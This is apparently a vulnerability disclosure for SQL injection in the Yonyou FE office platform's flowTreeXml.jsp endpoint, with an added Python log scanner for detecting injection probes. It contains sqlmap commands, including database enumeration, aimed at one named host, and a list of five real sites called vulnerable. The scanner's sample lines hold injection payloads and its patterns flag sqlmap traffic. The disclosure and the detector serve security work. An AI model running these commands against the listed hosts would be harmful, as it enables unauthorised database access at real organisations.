### Brief description:
Generic SQL injection in the Yonyou FE office platform
### Details:
The following URL is vulnerable to SQL injection:
/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
sqlmap -u "http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1"
[<img src="https://images.seebug.org/upload/201408/27112023517614365722160a22ef26e7a8ecd45a.jpg" alt="1.jpg" width="600">](https://images.seebug.org/upload/201408/27112023517614365722160a22ef26e7a8ecd45a.jpg)
sqlmap -u "http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1" --dbs
[<img src="https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg" alt="2.jpg" width="600">](https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg)
5 cases:
http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
http://oa.shunhengli.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
http://oa.chnjcdc.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
http://115.29.234.197:8090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
http://119.145.194.122:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
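
For operators of this product, one way to check web access logs for injection probing of the reported endpoint and parameter. This is an added example, not part of the original report; the Combined Log Format, the marker heuristics and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the report.
ENDPOINT = "/permissionsreport/flowTreeXml.jsp"
PARAM = "treeSearchKey"

# Assumption: a legitimate search key is a plain word or number, so quotes,
# comment tokens and SQL keywords in the decoded value are suspicious.
SQL_MARKERS = re.compile(
    r"""['";]|--|/\*|\b(?:union|select|sleep|waitfor|benchmark)\b"""
    r"""|\b(?:and|or)\b\s+\S+?\s*(?:=|<|>|\blike\b)""",
    re.IGNORECASE,
)
# Assumption: access logs are in Combined Log Format.
LOG_LINE = re.compile(
    r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def inspect(line):
    """Return the reasons a log line looks like injection probing, or []."""
    m = LOG_LINE.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    # Drop any ";jsessionid=..." path parameter before comparing.
    if url.path.split(";")[0] != ENDPOINT:
        return []
    reasons = []
    for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        if SQL_MARKERS.search(value):  # parse_qs has already URL-decoded it
            reasons.append(f"SQL syntax in {PARAM}: {value!r}")
    if "sqlmap" in m.group("ua").lower():  # sqlmap's default User-Agent
        reasons.append("sqlmap User-Agent")
    return reasons

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /permissionsreport/flowTreeXml.jsp?treeSearchKey=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /permissionsreport/flowTreeXml.jsp?treeSearchKey=1%20AND%205231%3D5231 HTTP/1.1" 200 512 "-" "sqlmap/1.0 (https://sqlmap.org)"',
    '198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /permissionsreport/flowTreeXml.jsp?treeSearchKey=1%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.jsp?q=select HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, line in enumerate(SAMPLE_LOG, 1):
        for reason in inspect(line):
            print(f"line {n}: {reason}")
```

Requests sent with a randomized User-Agent or in a POST body will not show up in these fields, so treat a clean result as absence of evidence only.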
### Proof of vulnerability:
[<img src="https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg" alt="2.jpg" width="600">](https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg)